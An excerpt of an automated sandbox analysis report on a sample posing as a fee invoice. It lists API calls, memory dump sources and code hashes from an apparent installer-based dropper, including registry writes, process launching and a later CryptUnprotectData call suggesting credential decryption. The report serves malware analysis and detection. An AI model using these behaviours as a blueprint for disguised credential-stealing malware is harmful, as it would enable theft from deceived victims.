                                                                                                                                  • GetProcAddress.KERNEL32(6FF421F0,00000000), ref: 6FF4165B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41664
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                  • Opcode ID: 9597c19324c2209fb4d76b6dc68868eb205bb3297a05ee0d7a14155a444f2c14
                                                                                                                                  • Instruction ID: 9d5ba8759c0f2fd736648b3e1a0434310c3fd660a4f225c8e4c9d191fed679e9
                                                                                                                                  • Opcode Fuzzy Hash: 9597c19324c2209fb4d76b6dc68868eb205bb3297a05ee0d7a14155a444f2c14
                                                                                                                                  • Instruction Fuzzy Hash: 8FF012721165387BDA2026AA8C4DD9BBE9CDF9B2F9B110311F618912A185624C15D7F1
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
                                                                                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                                  • Opcode Fuzzy Hash: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
                                                                                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp
                                                                                                                                  • API String ID: 2655323295-2806350230
                                                                                                                                  • Opcode ID: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
                                                                                                                                  • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                                                                  • Opcode Fuzzy Hash: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
                                                                                                                                  • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 2659869361-4083868402
                                                                                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                  • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                  • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Enum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                  • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                                                  • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 004061A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405880
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 1100898210-4083868402
                                                                                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 2709904686-1876063424
                                                                                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF4116A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF411C7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF411D9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41203
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 3a1d140ce9d7790a8ac4679739220dcfd0eec311042a48324d49bf86b216b017
                                                                                                                                  • Instruction ID: e382d621075a2ad45854d82a377b84f7f7e651598818a4affde7a12d22ca8790
                                                                                                                                  • Opcode Fuzzy Hash: 3a1d140ce9d7790a8ac4679739220dcfd0eec311042a48324d49bf86b216b017
                                                                                                                                  • Instruction Fuzzy Hash: 3331A1B24102059BDB029F78D945B667FECFF96320B10021AEC44E7363E774E9758B21
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:8.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:11.5%
                                                                                                                                  Total number of Nodes:96
                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: N
                                                                                                                                  • API String ID: 0-1130791706
                                                                                                                                  • Opcode ID: 9808fc2bb6274ac5dc108f63ef1c789571861608bb81e8d4df4b308f9a92a924
                                                                                                                                  • Instruction ID: 95db7438f39878b41ee03089fd54d98ae8b3790d51d8fc7a2212747418f2a3fd
                                                                                                                                  • Opcode Fuzzy Hash: 9808fc2bb6274ac5dc108f63ef1c789571861608bb81e8d4df4b308f9a92a924
                                                                                                                                  • Instruction Fuzzy Hash: 7B73E331D10B5A8EDB11EF68C954A99F7B1FF99300F51C69AE44877221EB70AAC4CF81
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39178F5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: edfe6520d174f7f29618fe410de85b6d9e5bcc18effc214db6f8ca13408a976c
                                                                                                                                  • Instruction ID: 61d8759b9bb723195f1c7ba11a44d580bd5cb239ad7b0d44a16b62fa17ed23ac
                                                                                                                                  • Opcode Fuzzy Hash: edfe6520d174f7f29618fe410de85b6d9e5bcc18effc214db6f8ca13408a976c
                                                                                                                                  • Instruction Fuzzy Hash: 7C2159768003499FDB10DFA9C841BDEBFF5EF48320F148459E558A7210C379A950CFA1
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39178F5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 6a1f12ad801ea4fdfaf3e3a86f1617f56482cd86055b19ef8a2ca792775337c8
                                                                                                                                  • Instruction ID: e4ac1897c253107a49edc891c53bf8a22622435a10fd7c3bf8c16af9d83d9c96
                                                                                                                                  • Opcode Fuzzy Hash: 6a1f12ad801ea4fdfaf3e3a86f1617f56482cd86055b19ef8a2ca792775337c8
                                                                                                                                  • Instruction Fuzzy Hash: 601126B680034ADFDB10DF9AC844BDEBBF5EF48320F148459E518A7210C779A950DFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90fda1e91199de16e0c962e6824baa355996fbe8885413651e4f5614edea0b98
                                                                                                                                  • Instruction ID: bce6079c39b5d66423b9fa0c1b7c8b8e11a4437b20cf53afcb348484dd4627fa
                                                                                                                                  • Opcode Fuzzy Hash: 90fda1e91199de16e0c962e6824baa355996fbe8885413651e4f5614edea0b98
                                                                                                                                  • Instruction Fuzzy Hash: A1A27130A40205CFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D731ED89CB52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fe660a9dee395c86d19a97f030f1f1bc8ffae4fd7609788d0a97f45ba4719a33
                                                                                                                                  • Instruction ID: da7223e0c7abfee50550962c207733d30c7af55892c17f768c5b538b5a8b2bd6
                                                                                                                                  • Opcode Fuzzy Hash: fe660a9dee395c86d19a97f030f1f1bc8ffae4fd7609788d0a97f45ba4719a33
                                                                                                                                  • Instruction Fuzzy Hash: B7824B74E012288FDB65DF69CD94BDDBBB2BB89301F1081E9990DA7261DB305E81DF81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6f76ffc7393c1b102573c12e97d4556ed232c28e4c9b4c6e0eafa79e374d0404
                                                                                                                                  • Instruction ID: 7fbca0ec5554fd6f10093b32647ef030b1c917f55522ea78bf171822fcb7d386
                                                                                                                                  • Opcode Fuzzy Hash: 6f76ffc7393c1b102573c12e97d4556ed232c28e4c9b4c6e0eafa79e374d0404
                                                                                                                                  • Instruction Fuzzy Hash: F0325C6680D7D48FCB638B744CA825B7FB16B92105B8945DFC4C78B687EB28C609C362
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
